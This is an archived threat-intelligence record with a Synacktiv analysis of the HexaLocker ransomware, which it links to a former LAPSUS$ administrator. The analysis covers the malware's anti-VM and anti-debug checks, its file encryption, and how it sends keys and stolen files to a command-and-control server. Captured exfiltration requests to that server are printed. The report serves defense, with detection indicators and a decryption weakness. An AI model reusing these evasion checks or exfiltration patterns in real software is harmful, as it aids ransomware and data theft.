{ "id": "dac4a5bd-5b83-4ea6-858d-a593e15fe5a4", "created_at": "2026-04-06T00:07:18.372208Z", "updated_at": "2026-04-10T03:28:46.92538Z", "deleted_at": null, "sha1_hash": "9ba9d07cf35d9c1bdde574b53909cdf65cef2cfd", "title": "LAPSUS$ is dead, long live HexaLocker?", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 986463, "plain_text": "LAPSUS$ is dead, long live HexaLocker?\r\nBy Théo Letailleur\r\nArchived: 2026-04-05 15:47:09 UTC\r\nThe LAPSUS$ threat group has been known since 2021 for spear phishing, data theft, and extortion against large\r\ncompanies (e.g., Microsoft, Nvidia, Uber). Although evidence of destruction methods was reported, there was no\r\nknown use of ransomware. In June 2024, LAPSUS$ announced its closure. However, two months later, a new\r\nransomware called HexaLocker was advertised on Telegram channels. Its \"only real\" admin and probable\r\ndeveloper is ZZART3XX, one of the LAPSUS$ administrators. This article will dissect the HexaLocker\r\nransomware sample to uncover its capabilities and help organizations that could be impacted by this new strain.\r\nVous souhaitez améliorer vos compétences ? Découvrez nos sessions de formation ! En savoir plus\r\nIntroduction\r\nOn August 9th, 2024, the HexaLocker team advertised a new Windows ransomware on its Telegram channel. The\r\nmessage included a demonstration video and text promoting a Golang ransomware that implements a proprietary\r\nalgorithm. Its features were also listed:\r\nhttps://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nPage 1 of 8\n\nHexaLocker ransomware advertisement on Telegram\r\nIt seems that the HexaLocker ransomware stores decryption keys on bulletproof servers. This suggests that the\r\ndecryption keys are sent to distant servers during the encryption process, but may not be protected with\r\nasymmetric cryptography (RSA, ECDH), as we would usually observe with this kind of malware. Finally, data\r\nexfiltration, FUD, and anti-analysis capabilities are promoted.\r\nThis article describes the actual capabilities of HexaLocker, based on one of its samples. A YARA rule and list of\r\nindicators are mentioned at the end of the article.\r\nHexaLocker analysis\r\nSince July, a few HexaLocker samples have been available on VirusTotal, showing different evolutions. The\r\nsample dissected in this article is the most recent and advanced one (for HexaLocker) in terms of features that we\r\ncould find to date (August 23rd).\r\nBasic information\r\nHexaLocker basic information\r\nhttps://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nPage 2 of 8\n\nSHA256 87c1869871e9be8adaacb41a16c8fff691f86591416a592a77e308c4b7c041be\r\nFile type PE32+ executable (console) x86-64, Compiler: Go (\u003e=1.15)\r\nFile size 7966720 bytes\r\nThreat Windows Golang ransomware and file stealer\r\nThe sample is not stripped, and the metadata provides the pathname of the Golang source file:\r\nC:/Users/zzart/Desktop/MalwareDeveloppement/HexaLocker RaaS/crypter_files.go . The username zzart\r\nmost likely refers to ZZART3XX1, one of the LAPSUS$ administrators.\r\nCapabilities\r\nHere is a summary of HexaLocker's capabilities (order of execution):\r\n1. Anti-analysis (anti-VM, anti-debugging): Uses an open-source Golang module called GoDefender2. We\r\nhave also seen another HexaLocker sample\r\n( be759e58413431dbe40d29ea5e399b1ebbfe75847c19a5a8f2610dab9f78ca8b ) using a different anti-VM\r\nmodule called chacal3.\r\n2. File encryption: Recursively encrypts files in C:\\Users with AES-256-GCM using a random password\r\nderived with Argon2ID. The \".hexalocker\" extension is appended to the filename. Before encryption starts,\r\ndecryption keys are AES-encrypted with a hardcoded key and sent to a remote HTTPS server via GET\r\nmethod parameters.\r\n3. Ransom: The ransom note is created on the current user's desktop as \"Readme.txt\" and opened with\r\nnotepad.exe .\r\n4. File stealing: The current user's files, whose extensions correspond to specific patterns (documents, source\r\ncode, databases), are compressed into a single zip file and sent to a remote HTTPS server. Since this occurs\r\nafter encryption, the searched files also have the \".hexalocker\" extension.\r\nUpon execution, it opens a command prompt and outputs many debugging logs, which is not very stealthy.\r\nAnti-analysis\r\nRoutines from GoDefender are executed early in the program in a function called main.FortniteProtect . The\r\nfollowing mechanisms are used:\r\nAnti-Virtualization:\r\nDetecting USB drives.\r\nChecking for default virtualization usernames (e.g., Johnson, John Doe, malware, sandbox, test,\r\netc.).\r\nChecking for default virtualization video controllers (e.g., \"vmware\", \"virtualbox\").\r\nChecking for KVM environment files (e.g., baloon.sys , netkvm.sys ).\r\nDetecting triage environments based on disk drive names (e.g., DADY HARDDISK , QEMU HARDDISK ).\r\nhttps://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nPage 3 of 8\n\nDetecting small monitors (resolutions under 800×600 are suspicious).\r\nDetecting VM artifacts (VMware and VirtualBox drivers or guest tools).\r\nDetecting repetitive processes (more than 60 svchost.exe processes are suspicious).\r\nDetecting parallel virtualization environments (guest tools).\r\nAnti-Debug:\r\nDetecting common hooked functions used for anti-anti-debugging (e.g.,\r\nCheckRemoteDebuggerPresent , GetTickCount , etc.).\r\nChecking for blacklisted window names (e.g., IDA, ILSpy, Fiddler, x32dbg, etc.).\r\nUsing the classic IsDebuggerPresent and CheckRemoteDebuggerPresent routines.\r\nPerforming an internet connection check (TCP request to google.com:80 ).\r\nChecking the parent process (must be explorer.exe or cmd.exe ).\r\nVerifying the number of processes (must be above 50).\r\nChecking uptime (must be above 20 minutes).\r\nIf you need more technical information, most of those mechanisms are detailed in the great Unprotect Project4.\r\nThough, since they are all packed into one calling function, the bypass is trivial with a debugger, but it might\r\nprevent execution on automatic sandboxes.\r\nFile encryption\r\nNow, for the pièce de résistance: HexaLocker's file encryption capability.\r\nFirst, a 50-byte random alphanumeric password is generated, followed by a 16-byte random salt. This password is\r\nthen derived using the Argon2ID algorithm with the following parameters:\r\nThreads: 4\r\nIterations: 3\r\nMemory: 65536 KiB\r\nGenerated hash length: 32 bytes\r\nAnd the previously generated salt\r\nBefore the encryption starts, an HTTPS request is made to a distant server to send the password, the salt, and some\r\nhost information for identification purposes. This allows the ransomware operator to obtain the necessary\r\ncryptographic parameters to decrypt the files. The HTTP request is sent to https://darkslategray-baboon-853641.hostingersite[.]com/index.php , and the information is stored in the GET parameters. The password and\r\nsalt are only AES-GCM encrypted with a hardcoded key in the sample.\r\nBelow is a capture of such an HTTP request (intercepted with FakeNet tool):\r\n08/23/24 04:30:33 AM [ DNS Server] Received A request for domain 'darkslategray-baboon-853641.hostingers\r\n08/23/24 04:30:33 AM [ HTTPListener443] GET /index.php?method=new\u0026hwid=9F905EA7-EBD1-4D49-84F6-AE84E484E49F\u0026\r\n08/23/24 04:30:33 AM [ HTTPListener443] Host: darkslategray-baboon-853641.hostingersite.com\r\n08/23/24 04:30:33 AM [ HTTPListener443] User-Agent: Go-http-client/1.1\r\n08/23/24 04:30:33 AM [ HTTPListener443] Accept-Encoding: gzip\r\n08/23/24 04:30:33 AM [ HTTPListener443]\r\nhttps://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nPage 4 of 8\n\nThe values in the password and sel fields (sel stands for salt in French) are 28 bytes longer than expected. This is\r\nbecause they also contain the AES-GCM nonce (12 bytes) and the AES-GCM tag (16 bytes) ( nonce +\r\nciphertext + tag ).\r\nOnce the important cryptographic values are stored on the operator's server, the encryption process begins. This\r\nsample uses C:\\Users as the root directory and encrypts every file whose name matches a list of extensions. The\r\nextension list is quite extensive and encrypts nearly all file types. The targeted files are encrypted using AES-GCM. The 32-byte Argon2ID hash is used as the key with a 12-byte random nonce. Every encrypted file is saved\r\non disk with the \".hexalocker\" extension. The encrypted data also includes the nonce and the tag.\r\nSince there is no asymmetric cryptography involved, if a victim recovers the ransomware sample and has TLS\r\nproxy logs, they can decrypt and recover the files. We developed a proof-of-concept (PoC) program that\r\nsuccessfully recovers the encrypted files based on the password, salt, and hardcoded key stored in the sample. We\r\ncan provide the code for this program upon request.\r\nFinally, the ransom note is generated as a \"Readme.txt\" file on the current user's desktop and is automatically\r\nopened with notepad.exe .\r\nFile stealing\r\nhttps://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nPage 5 of 8\n\nHexaLocker searches for files in the current user's directories: Desktop, Documents, Favorites, Pictures, and\r\nVideos. The search pattern involves a list of extensions with the \".hexalocker\" suffix, as these files are already\r\nencrypted. Below is the list of extensions (split into categories for better readability):\r\nDocuments: .txt, .doc, .docx, .odt, .xls, .xlsx, .ods, .ppt, .pptx, .odp, .rtf, .md, .tex, .wps, .pages,\r\nData : .sql, .mdb, .accdb, .sqlite, .db, .dbf, .json, .csv, .numbers, .dif, .key, .plist, .trace, .tmp,\r\nSource code: .py, .java, .c, .cpp, .js, .html, .css, .ruby, .php, .swift, .go, .r, .asp, .jsp,\r\nConfiguration files: .ini, .cfg, .log, .xml, .yaml, .yml,\r\nArchives: .zip, .rar, .tar, .gz, .7z, .bz2, .lz, .xz,\r\nPictures: .jpg, .jpeg, .png, .gif, .bmp, .tiff,\r\nVideos: .mp3, .wav, .avi, .mp4, .mov\r\nAll the corresponding files are added to a new zip file named with the host UUID, located in the %Temp% folder.\r\nThe zip file is then sent to the remote server via a single POST HTTPS request. The PHP file in the URL is\r\ndifferent from the previous one: https://darkslategray-baboon-853641.hostingersite[.]com/receive.php .\r\nBelow is a capture of such an HTTP request (intercepted with FakeNet tool):\r\n08/23/24 05:20:13 AM [ DNS Server] Received A request for domain 'darkslategray-baboon-853641.hostingers\r\n08/23/24 05:20:14 AM [ HTTPListener443] POST /receive.php HTTP/1.1\r\n08/23/24 05:20:14 AM [ HTTPListener443] Host: darkslategray-baboon-853641.hostingersite.com\r\n08/23/24 05:20:14 AM [ HTTPListener443] User-Agent: Go-http-client/1.1\r\n08/23/24 05:20:14 AM [ HTTPListener443] Content-Length: 36618\r\n08/23/24 05:20:14 AM [ HTTPListener443] Content-Type: multipart/form-data; boundary=a9cf213cc8cf5b6fffefc664\r\n08/23/24 05:20:14 AM [ HTTPListener443] Accept-Encoding: gzip\r\n08/23/24 05:20:14 AM [ HTTPListener443]\r\n08/23/24 05:20:14 AM [ HTTPListener443] --a9cf213cc8cf5b6fffefc664759d93533d3ed8975bb56ad6f6603dd6414d\r\n08/23/24 05:20:14 AM [ HTTPListener443] Content-Disposition: form-data; name=\"file\"; filename=\"9F905EA7-EBD1\r\n08/23/24 05:20:14 AM [ HTTPListener443] Content-Type: application/octet-stream\r\n08/23/24 05:20:14 AM [ HTTPListener443]\r\n08/23/24 05:20:14 AM [ HTTPListener443] .C:\\Users\\bonjour\\Desktop\\loremipsum.txt.hexalocker@|-h#!.m,~bO@dGYxX\r\n:nfDhfUY{w7fttg0hH-}i #^F_i(,aryNݷfL .0%#MqvAi]espPeہF.Me%\u003cIpHOPҚ\")$dx X\u0026ukܺ\r\n[... Compressed and encrypted data ...]\r\nWe did not stress-test the server, but the HTTP request could become quite large depending on the size and\r\nnumber of documents located in the victim's user profile.\r\nConclusion\r\nHexaLocker is a Golang ransomware that currently operates only on Windows operating systems. It encrypts files\r\nwith AES-256-GCM using a random password derived with Argon2ID. Decryption keys are then AES-encrypted\r\nwith a hardcoded key and finally sent to a remote HTTPS server. No asymmetric cryptography is involved.\r\nHexaLocker also includes file-stealing capabilities. Additionally, the developer has used the open-source module\r\nGoDefender to protect the code from dynamic analysis and debugging.\r\nhttps://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nPage 6 of 8\n\nThere are certainly expected evolutions in HexaLocker's code, but we can already observe the main features and\r\nbehaviour of this new strain, as revealed by the analysed sample. If HTTPS requests are intercepted (e.g., with a\r\ncorporate proxy) the password and salt can be collected and used to decrypt affected files. To perform the\r\ndecryption, the PoC program we developed can be reused, though it may need some adjustments, as we anticipate\r\nthe hardcoded keys will change in future builds.\r\nMoreover, HexaLocker's impact on organizations could be imminent, as its team has announced an alliance with a\r\nnew ransomware gang called DoubleFace to \"collaborate on big attacks\". They are also seeking other partners to\r\nhelp them spread their ransomware on a large scale.\r\nHexaLocker teaming up with DoubleFace\r\nThe X (formerly Twitter) handle @ZZART3XX is mentioned, describing themselves as an administrator of\r\n(formerly) LAPSUS$, GLORIAMIST, and HexaLocker.\r\nYou can find a YARA rule and a list of IOCs in this GitHub repository: https://github.com/synacktiv/hexalocker-analysis\r\nhttps://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nPage 7 of 8\n\nIf any organization requires assistance in doubt removal or responding to a compromise, please feel free to contact\r\nSynacktiv.\r\nSource: https://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nhttps://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html" ], "report_names": [ "lapsus-is-dead-long-live-hexalocker.html" ], "threat_actors": [ { "id": "be5097b2-a70f-490f-8c06-250773692fae", "created_at": "2022-10-27T08:27:13.22631Z", "updated_at": "2026-04-10T02:00:05.311385Z", "deleted_at": null, "main_name": "LAPSUS$", "aliases": [ "LAPSUS$", "DEV-0537", "Strawberry Tempest" ], "source_name": "MITRE:LAPSUS$", "tools": [ "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "d4b9608d-af69-43bc-a08a-38167ac6306a", "created_at": "2023-01-06T13:46:39.335061Z", "updated_at": "2026-04-10T02:00:03.291149Z", "deleted_at": null, "main_name": "LAPSUS", "aliases": [ "Lapsus", "LAPSUS$", "DEV-0537", "SLIPPY SPIDER", "Strawberry Tempest", "UNC3661" ], "source_name": "MISPGALAXY:LAPSUS", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b98eb1ec-dc8b-4aea-b112-9e485408dd14", "created_at": "2022-10-25T16:07:23.649308Z", "updated_at": "2026-04-10T02:00:04.701157Z", "deleted_at": null, "main_name": "FunnyDream", "aliases": [ "Bronze Edgewood", "Red Hariasa", "TAG-16" ], "source_name": "ETDA:FunnyDream", "tools": [ "Chinoxy", "Filepak", "FilepakMonitor", "FunnyDream", "Keyrecord", "LOLBAS", "LOLBins", "Living off the Land", "Md_client", "PCShare", "ScreenCap", "TcpBridge", "Tcp_transfer", "ccf32" ], "source_id": "ETDA", "reports": null }, { "id": "2347282d-6b88-4fbe-b816-16b156c285ac", "created_at": "2024-06-19T02:03:08.099397Z", "updated_at": "2026-04-10T02:00:03.663831Z", "deleted_at": null, "main_name": "GOLD RAINFOREST", "aliases": [ "Lapsus$", "Slippy Spider ", "Strawberry Tempest " ], "source_name": "Secureworks:GOLD RAINFOREST", "tools": [ "Mimikatz" ], "source_id": "Secureworks", "reports": null }, { "id": "52d5d8b3-ab13-4fc4-8d5f-068f788e4f2b", "created_at": "2022-10-25T16:07:24.503878Z", "updated_at": "2026-04-10T02:00:05.014316Z", "deleted_at": null, "main_name": "Lapsus$", "aliases": [ "DEV-0537", "G1004", "Slippy Spider", "Strawberry Tempest" ], "source_name": "ETDA:Lapsus$", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434038, "ts_updated_at": 1775791726, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9ba9d07cf35d9c1bdde574b53909cdf65cef2cfd.pdf", "text": "https://archive.orkl.eu/9ba9d07cf35d9c1bdde574b53909cdf65cef2cfd.txt", "img": "https://archive.orkl.eu/9ba9d07cf35d9c1bdde574b53909cdf65cef2cfd.jpg" } }